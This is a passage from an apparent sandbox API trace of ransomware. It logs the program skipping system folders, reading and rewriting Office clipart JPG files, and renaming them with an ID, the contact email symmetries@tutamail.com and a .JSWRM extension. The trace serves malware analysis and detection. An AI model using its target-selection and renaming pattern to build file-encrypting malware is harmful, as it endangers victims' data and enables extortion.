[0079.768] lstrcmpiW (lpString1="J0099165.JPG", lpString2="system volume information") returned -1 [0079.768] lstrcmpiW (lpString1="J0099165.JPG", lpString2="msocache") returned -1 [0079.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0079.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099165.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099165.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099165.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0079.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0079.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099165.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099165.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099165.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0079.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0079.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0079.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0079.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099165.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.769] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=50490) returned 1 [0079.769] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc530) returned 0x24d210 [0079.769] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xc530, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xc530, lpOverlapped=0x0) returned 1 [0079.774] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.774] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xc530, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xc530, lpOverlapped=0x0) returned 1 [0079.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.775] CloseHandle (hObject=0x314) returned 1 [0079.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0079.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0079.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0079.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0079.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0079.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0079.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.776] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099165.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099165.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0079.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0079.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0079.777] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe081920, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe081920, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe0a7b88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfcff, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099166.JPG", cAlternateFileName="")) returned 1 [0079.777] lstrcmpiW (lpString1="J0099166.JPG", lpString2=".") returned 1 [0079.777] lstrcmpiW (lpString1="J0099166.JPG", lpString2="..") returned 1 [0079.777] lstrcmpiW (lpString1="J0099166.JPG", lpString2="...") returned 1 [0079.777] lstrcmpiW (lpString1="J0099166.JPG", lpString2="windows") returned -1 [0079.777] lstrcmpiW (lpString1="J0099166.JPG", lpString2="recovery") returned -1 [0079.777] lstrcmpiW (lpString1="J0099166.JPG", lpString2="perflogs") returned -1 [0079.777] lstrcmpiW (lpString1="J0099166.JPG", lpString2="documents and settings") returned 1 [0079.777] lstrcmpiW (lpString1="J0099166.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.777] lstrcmpiW (lpString1="J0099166.JPG", lpString2="system volume information") returned -1 [0079.777] lstrcmpiW (lpString1="J0099166.JPG", lpString2="msocache") returned -1 [0079.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099166.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099166.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099166.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0079.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099166.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099166.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099166.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0079.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0079.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0079.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0079.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099166.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.778] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=64767) returned 1 [0079.778] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xfcf0) returned 0x24d210 [0079.778] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xfcf0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xfcf0, lpOverlapped=0x0) returned 1 [0079.797] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.797] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xfcf0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xfcf0, lpOverlapped=0x0) returned 1 [0079.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.798] CloseHandle (hObject=0x314) returned 1 [0079.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0079.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0079.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0079.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0079.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0079.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0079.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.798] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099166.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099166.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0079.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0079.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0079.799] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe081920, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe081920, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe0a7b88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xabad, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099167.JPG", cAlternateFileName="")) returned 1 [0079.799] lstrcmpiW (lpString1="J0099167.JPG", lpString2=".") returned 1 [0079.799] lstrcmpiW (lpString1="J0099167.JPG", lpString2="..") returned 1 [0079.799] lstrcmpiW (lpString1="J0099167.JPG", lpString2="...") returned 1 [0079.799] lstrcmpiW (lpString1="J0099167.JPG", lpString2="windows") returned -1 [0079.799] lstrcmpiW (lpString1="J0099167.JPG", lpString2="recovery") returned -1 [0079.799] lstrcmpiW (lpString1="J0099167.JPG", lpString2="perflogs") returned -1 [0079.799] lstrcmpiW (lpString1="J0099167.JPG", lpString2="documents and settings") returned 1 [0079.799] lstrcmpiW (lpString1="J0099167.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.799] lstrcmpiW (lpString1="J0099167.JPG", lpString2="system volume information") returned -1 [0079.799] lstrcmpiW (lpString1="J0099167.JPG", lpString2="msocache") returned -1 [0079.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0079.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099167.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099167.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099167.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0079.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0079.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099167.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099167.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099167.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0079.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0079.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0079.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0079.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099167.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.801] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=43949) returned 1 [0079.801] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xaba0) returned 0x24d210 [0079.801] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xaba0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xaba0, lpOverlapped=0x0) returned 1 [0079.806] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.806] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xaba0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xaba0, lpOverlapped=0x0) returned 1 [0079.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.807] CloseHandle (hObject=0x314) returned 1 [0079.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0079.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0079.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0079.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0079.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0079.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0079.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0079.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0079.808] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099167.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099167.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0079.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0079.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0079.809] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe081920, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe081920, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe0a7b88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ed3, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099168.JPG", cAlternateFileName="")) returned 1 [0079.809] lstrcmpiW (lpString1="J0099168.JPG", lpString2=".") returned 1 [0079.809] lstrcmpiW (lpString1="J0099168.JPG", lpString2="..") returned 1 [0079.809] lstrcmpiW (lpString1="J0099168.JPG", lpString2="...") returned 1 [0079.809] lstrcmpiW (lpString1="J0099168.JPG", lpString2="windows") returned -1 [0079.809] lstrcmpiW (lpString1="J0099168.JPG", lpString2="recovery") returned -1 [0079.809] lstrcmpiW (lpString1="J0099168.JPG", lpString2="perflogs") returned -1 [0079.809] lstrcmpiW (lpString1="J0099168.JPG", lpString2="documents and settings") returned 1 [0079.809] lstrcmpiW (lpString1="J0099168.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.809] lstrcmpiW (lpString1="J0099168.JPG", lpString2="system volume information") returned -1 [0079.809] lstrcmpiW (lpString1="J0099168.JPG", lpString2="msocache") returned -1 [0079.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0079.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099168.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099168.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099168.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0079.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0079.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099168.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099168.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099168.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0079.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0079.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0079.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 